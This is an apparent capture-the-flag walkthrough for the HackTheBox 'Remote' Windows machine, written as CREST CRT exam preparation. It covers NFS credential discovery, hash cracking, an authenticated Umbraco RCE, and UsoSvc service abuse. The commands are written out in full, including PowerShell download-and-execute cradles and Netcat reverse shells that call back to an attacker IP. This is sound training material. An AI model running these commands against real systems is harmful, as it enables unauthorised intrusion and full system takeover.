We covered HackTheBox Remote machine as part of CREST CRT (Registered Penetration Tester) Track. We demonstrated Umbraco CMS exploitation and more than one path to escalate privileges on Windows.

Remote is an easy difficulty Windows machine that features an Umbraco CMS installation. Credentials are found in a world-readable NFS share. Using these, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can gain a password. This password has been reused with the local administrator account. Using `psexec` with these credentials returns a SYSTEM shell.


Initial Enumeration

I started with an Nmap scan, which revealed open ports, including Port 80 (HTTP), Port 2049 (NFS), and SMB ports (445, 135, 139). I decided to begin by examining the web server.

Web Server Enumeration

I identified the website as using the Umbraco Content Management System (CMS). The administration panel is typically found at the /umbraco directory. A search for exploits revealed an authenticated remote code execution vulnerability for Umbraco.

NFS Enumeration and Credential Discovery

I used the showmount -e [IP_ADDRESS] command to list NFS shares. I found an open share named site_backups with “everyone” permissions. I mounted the share locally using mount -t nfs [IP_ADDRESS]:/site_backups /mnt/.

Inside the mounted share, I found a file named Umbraco.sdf in the updater directory, which is a standard database format file. I used the strings Umbraco.sdf | less command to extract readable information from the database file. This revealed usernames and password hashes, and I focused on the hash for admin@htb.local.

Password Cracking

I used Hashcat to crack the SHA1 hash with hashcat -m 100 [HASH_FILE] [WORDLIST_PATH] --force. This process takes time, so I didn’t run it live but noted the command.

Exploitation

I then used a Python exploit script for Umbraco. The command to run the exploit was: python exploit.py -u admin@htb.local -p [CRACKED_PASSWORD] -i http://[IP_ADDRESS]/ -c "powershell -c iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/shell.ps1')". This command downloads and executes a PowerShell reverse shell (shell.ps1) from my attacker’s machine.

I started a Python HTTP server on my machine to serve the shell.ps1 file using python3 -m http.server [PORT]. I also set up a Netcat listener on my machine to receive the reverse shell with nc -lvp 4545. I modified the shell.ps1 script to connect back to my IP and port 4545.

Post-Exploitation – Initial Foothold

Once the reverse shell was caught, I ran systeminfo to gather system details and whoami to identify the current user, which was iis apppool\defaultapppool. I also used whoami /priv to check user privileges.

Privilege Escalation

I used the PowerUp PowerShell script for privilege escalation enumeration. I downloaded the script to the victim machine (e.g., into c:\users\public) using iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/powerup.ps1') or (New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/powerup.ps1', 'C:\path\to\powerup.ps1').

I then executed PowerUp by importing its functions (. .\powerup.ps1) and running Invoke-AllChecks. PowerUp identified two potential privilege escalation vectors: Juicy Potato (due to SeImpersonatePrivilege) and Service Abuse (UsoSvc). I skipped Juicy Potato as it’s a common technique.

PowerUp suggested Invoke-ServiceAbuse -Name UsoSvc. Running this command by default creates a new user and adds them to the administrators group, but this user might not be able to log in via WinRM.

I opted for a modified service abuse to get a direct administrator shell. I downloaded Netcat (nc.exe) to the victim machine (e.g., c:\users\public). I started a new Netcat listener on my attacker’s machine: nc -lvp 4547. Then, I used the Invoke-ServiceAbuse command with a custom command to connect back: Invoke-ServiceAbuse -Name UsoSvc -Command "C:\users\public\nc.exe [ATTACKER_IP] 4547 -e cmd.exe". This resulted in a shell as nt authority\system, which I confirmed with whoami.

Other Mentioned Methods (Not Demonstrated in Detail)

I also briefly considered using Metasploit, but encountered issues with shells dying immediately. I attempted to log in with the user created by PowerUp’s default service abuse using Evil-WinRM (evil-winrm -i [VICTIM_IP] -u John -p [PASSWORD]), but it failed due to authorization issues.

Technical Commands Used

Here are the technical commands I used:

  • nmap (for initial scanning)
  • showmount -e [IP_ADDRESS]
  • mount -t nfs [IP_ADDRESS]:/site_backups /mnt/
  • strings Umbraco.sdf | less
  • hashcat -m 100 [HASH_FILE] [WORDLIST_PATH] --force
  • python exploit.py -u admin@htb.local -p [CRACKED_PASSWORD] -i http://[IP_ADDRESS]/ -c "powershell -c iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/shell.ps1')"
  • python3 -m http.server [PORT]
  • nc -lvp 4545
  • systeminfo
  • whoami
  • whoami /priv
  • iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/powerup.ps1')
  • (New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/powerup.ps1', 'C:\path\to\powerup.ps1')
  • . .\powerup.ps1
  • Invoke-AllChecks
  • nc -lvp 4547
  • Invoke-ServiceAbuse -Name UsoSvc -Command "C:\users\public\nc.exe [ATTACKER_IP] 4547 -e cmd.exe"
  • evil-winrm -i [VICTIM_IP] -u John -p [PASSWORD]

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles